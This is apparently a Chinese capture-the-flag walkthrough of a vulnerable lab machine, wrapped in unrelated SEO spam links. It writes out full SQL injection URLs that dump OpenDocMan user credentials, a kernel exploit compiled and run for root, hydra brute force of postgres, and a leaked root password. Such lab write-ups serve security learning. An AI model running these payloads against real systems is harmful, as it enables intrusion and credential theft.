当前位置: 首页 > wzjs >正文

摄影培训网站建设互联网营销专家

摄影培训网站建设,互联网营销专家,苏州免费网站制作,网站备案查询姓名春秋蝉鸣少年归~ arp发现靶机ip地址 发现开放80端口那先去访问一下 问题不大,没有什么有用的提示那就上dirb跑一下 这里给了一个版本号 通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看 这个也试了一下也利用不了回到页面上发现有个website可以点 然后…

春秋蝉鸣少年归~


arp发现靶机ip地址

发现开放80端口那先去访问一下

问题不大,没有什么有用的提示那就上dirb跑一下

这里给了一个版本号

通过searchsploit搜索了一下没有这个版本的poc/exp去网上搜搜看

这个也试了一下也利用不了回到页面上发现有个website可以点

然后我们会来到一个新的网站

最终在每个页面都看了一下,发现这个页面的鼠标放上去鼠标会变,这里也是给了账号密码

通过提示我们用给的用户名和密码去访问一下

来到这个地方我们发现一个大大的logo就是这个opendocman,还是老样子去searchsploit搜索一下刚好有一个符合的

拿到当前目录下好好看看

这个意思是有两个漏洞可以用一个sql注入一个权限提升的

尝试利用
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version(),3,4,5,6,7,8,9

爆破库名
192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user  UNION SELECT 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata

爆表
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()

字段
192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_schema=database()

查表
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x6f646d5f75736572
佬说这里有一个注意点,就是用字符串表名来查表的时候查不出来,需要把表的字符串换成16进制0x6f646d5f75736572

查密码
http://192.168.52.151/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,group_concat(username,password),3,4,5,6,7,8,9 from odm_user

给了两个密码咱们都试试

ssh直接连

进来先用python获取一个交互式shell,可以看到内核是一个低版本的去search一下

有两个符合先试试.c

将.c文件wget到tmp目录下,看看.c怎么执行的,编译后./ofs执行提权脚本,成功获取权限

第二种方式 解压目录下的文件夹,hydra

./confingure好了之后告诉我们make

安装成功

ps -aux时发现postgres进行信息,还有hydra尝试进行一下爆破

来到usr/share/wordlists/metasploit目录下面有postgres的默认密码和用户的密码本这样结合hydra爆破一下

./hydra -L user.txt -P passwd.txt localhost postgres

登录postgres psql -h localhost -U postgres

查看database

\c 进入到这个system

SLECT * FROM users;

su切换到vulnosadmin 查看有一个r00t.blend 通过cp挂在html目录下

wget下载r00t.blend

来到这个https://imagetostl.com/cn/view-blend-online网站下点击上传就可以看到,然后用密码登录root即可ab12fg//drg

http://www.dtcms.com/wzjs/50604.html

相关文章:

  • 公司电子产品网站模板北京疫情太严重了
  • 企业网站需求方案百度代发排名
  • 贵州中小型营销型网站建设公司seo是指什么意思
  • 中国化工建设网站365优化大师软件下载
  • 网站建设茂名成都网络营销推广
  • 自建网站有哪些正规软件开发培训学校
  • 易龙天做的网站怎么样网络营销期末考试题库
  • 做房产应看的网站谷歌浏览器手机版官网下载
  • 邯郸哪儿做网站便宜营销页面
  • 专业仿站网站建设网站检测中心
  • 网络广告推广方法seo学习网站
  • 查看网站开发商什么是百度竞价
  • 车佣做汽车网站怎么样广东东莞疫情最新消息今天又封了
  • 国安中建建设集团网站游戏网站交换友情链接
  • 企业网站找私人做什安卓嗅探app视频真实地址
  • 域名注册商网站宁波seo如何做推广平台
  • 地方门户网站运营百度排名查询
  • 怎样用dw做 网站首页英文网站推广
  • 江都建设局网站李局北京seo顾问推推蛙
  • 做网站卖产品在线h5免费制作网站
  • 重庆互联网公司排行榜简述优化搜索引擎的方法
  • 淘宝客网站程序购米百度爱采购优化排名软件
  • 经典企业网站天津seo标准
  • 国内建站 wordpress定向推广
  • 石家庄网站建设接单怎么推广app让人去下载
  • 对日软件开发流程seo教学网seo
  • 品牌网站建设服务商看网站时的关键词
  • 省级门户网站建设洛阳市网站建设
  • 生鲜网站建设规划书范文广州的百度推广公司
  • 如何自己做网站 开直播百度seo霸屏软件